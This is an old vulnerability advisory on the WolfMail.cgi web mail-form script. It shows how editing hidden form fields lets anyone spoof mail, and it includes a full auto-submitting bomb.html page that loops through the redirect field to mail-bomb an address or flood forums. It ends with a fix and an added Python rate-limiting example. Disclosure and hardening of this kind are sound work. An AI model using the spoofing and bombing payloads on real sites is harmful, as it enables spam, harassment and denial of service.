`
*+-._\_.-+*
WolfMail.cgi
*+-._/_.-+*
by Dead Beat
The Advanced Knowledge Network
http://www.advknowledge.net
Mail irritation possibility
(fake and high-fire an account)
WolfMail is a script similar to formmail.cgi that lets users send mail from a
web page without using their mail client. However, I guess the developers didn't
want the script to be configured inside the script itself; instead, all the
variables are sent to the script from the HTML file that calls it.
________
FAKING:
As said, most of the real configuration is done in the _.html file itself, so for
example the <input type="hidden" name="recipient" value="[email protected]">
is specified in the _.html file of the composer. Anyone can download the page and
change the code. If, for example, you want to fake a mail to "[email protected]", you
just have to change the value field. Other things like subject and cc can be defined
as well (read the installation papers to learn more).
For example:
<input type="hidden" name="recipient" value="[email protected]">
<input type="hidden" name="subject" value="From your site...">
could be changed to:
<input type="text" name="recipient" value="[email protected]">
<input type="text" name="subject" value="Hi you">
<input type="text" name="abemail" value="[email protected]" size="17" maxlength="140">
That would allow you to define those two values yourself and send the mail from [email protected] to [email protected].
Just so that I don't get mails from users who don't understand this:
when you download the HTML file to change it, you have to set the path to where
formmail.php actually is. In the downloaded file you will find a line like this:
<form action="scripts/formmail.php" method="POST" enctype="multipart/form-data">
If you downloaded it from http://www.mailscriptuser.com/contact.html, you have to change the line above to:
<form action="http://www.mailscriptuser.com/scripts/formmail.php" method="POST" enctype="multipart/form-data">
Got that? Good. The next little security vulnerability attackers could trip over is bombing an address.
___________
HIGH FIRE
There is a variable called "redirect" that lets you send the user to a page after the
mail has been sent (something that tells them "Thanks! Your mail was sent" or whatever).
This option looks like this:
<input TYPE="HIDDEN" name="redirect" value="http://www.domain.com/contact/mail/thanks.htm">
Since the script itself doesn't check (log) your IP, an attacker could download the HTML
file, predefine all values (message, subject, recipient, ...), add JavaScript that reloads
the page, and set the redirect URL to the HTML file with the predefined values. This way a
loop would run and send emails over and over again.
EXAMPLE bomb.html:
<html>
<head>
</head>
<body onload="document.bomber.submit();">
<form name="bomber" method="POST" action="http://www.domain.com/contact/mail/wolfmail.cgi">
<input TYPE="text" name="required" value="adMail-Text|abemail">
<input TYPE="text" name="subject" value="Exploiting wolfmail.cgi">
<input TYPE="text" name="recipient" value="[email protected]">
<input TYPE="text" name="redirect" value="C:\Exploit\bomb.html">
<input type="text" name="aaName" value="Wolfmail Exploiter" size="17" maxlength="140">
<input type="text" name="abemail" value="[email protected]" size="17" maxlength="140">
<textarea name="adMail-Text" rows="4" cols="13" wrap="virtual">Bombing text goes here</textarea>
<input type="submit" value="submit">
</form>
</body>
</html>
The script above can of course be used against many forms, so other mail forms may be
affected too. It is also possible to flood forums with such a script! I hope you will
re-configure and check your forms and the actual scripts behind them for this
vulnerability. If you have found another script that this trick works with, mail me;
I will include it here and you will get credit of course!
SOLUTION
You should change the script or use another one, so that each IP you send from can only be
used ONCE, and have the email address predefined in a file or in the script itself.
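One way to apply this fix, shown as an added example that is not part of the original advisory or WolfMail's own code: the handler takes recipient, subject and redirect from server-side configuration and limits accepted submissions per client IP. It generalizes "ONCE" to a limit per time window. The names form_id, FORMS and the example.org values are assumptions; abemail and adMail-Text are the field names from the form above.

```python
import time

# Server-side configuration (constructed values): never read from the POST.
FORMS = {
    "contact": {
        "recipient": "webmaster@example.org",
        "subject": "From your site...",
        "redirect": "https://www.example.org/contact/mail/thanks.htm",
    },
}
MAX_PER_WINDOW = 1        # the advisory's "ONCE"; raise for real traffic
WINDOW_SECONDS = 3600
_seen = {}                # client IP -> timestamps of accepted submissions


def allowed(ip, now):
    """Sliding-window limit on accepted submissions per client IP."""
    recent = [t for t in _seen.get(ip, []) if now - t < WINDOW_SECONDS]
    _seen[ip] = recent
    if len(recent) >= MAX_PER_WINDOW:
        return False
    recent.append(now)
    return True


def handle_submission(form, client_ip, now=None):
    """Return (status, mail, redirect); mail is None when rejected."""
    now = time.time() if now is None else now
    cfg = FORMS.get(form.get("form_id", ""))   # form_id: hypothetical field
    if cfg is None:
        return ("unknown form", None, None)
    if not allowed(client_ip, now):
        return ("rate limited", None, None)
    # Posted "recipient", "subject" and "redirect" fields are ignored, so an
    # edited copy of the form cannot retarget the mail or loop the redirect.
    mail = {
        "to": cfg["recipient"],
        "subject": cfg["subject"],
        "reply_to": form.get("abemail", ""),
        "body": form.get("adMail-Text", ""),
    }
    return ("sent", mail, cfg["redirect"])


if __name__ == "__main__":
    # Constructed tampered POST: sender tries to override recipient/redirect.
    post = {"form_id": "contact", "recipient": "victim@example.net",
            "redirect": "file:///bomb.html", "adMail-Text": "hi"}
    print(handle_submission(post, "192.0.2.10", now=0))   # sent, fixed target
    print(handle_submission(post, "192.0.2.10", now=10))  # rate limited
```

The in-memory _seen table only works for a single long-running process; a CGI script started per request would need to keep it in a file or database.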
I am quite sure that these aren't all of the bugs but I didn't really go into the code. This is
just what I saw first. Thanks to b0iler and Ravish! Greetings out to StartX, Road^K|ll, Silver
and all of my friends I forgot!
Truthfully,
Dead Beat, [email protected]
The Advanced Knowledge Network
http://www.advknowledge.net
Want more, new, better BUGS and other information? Then visit us!
`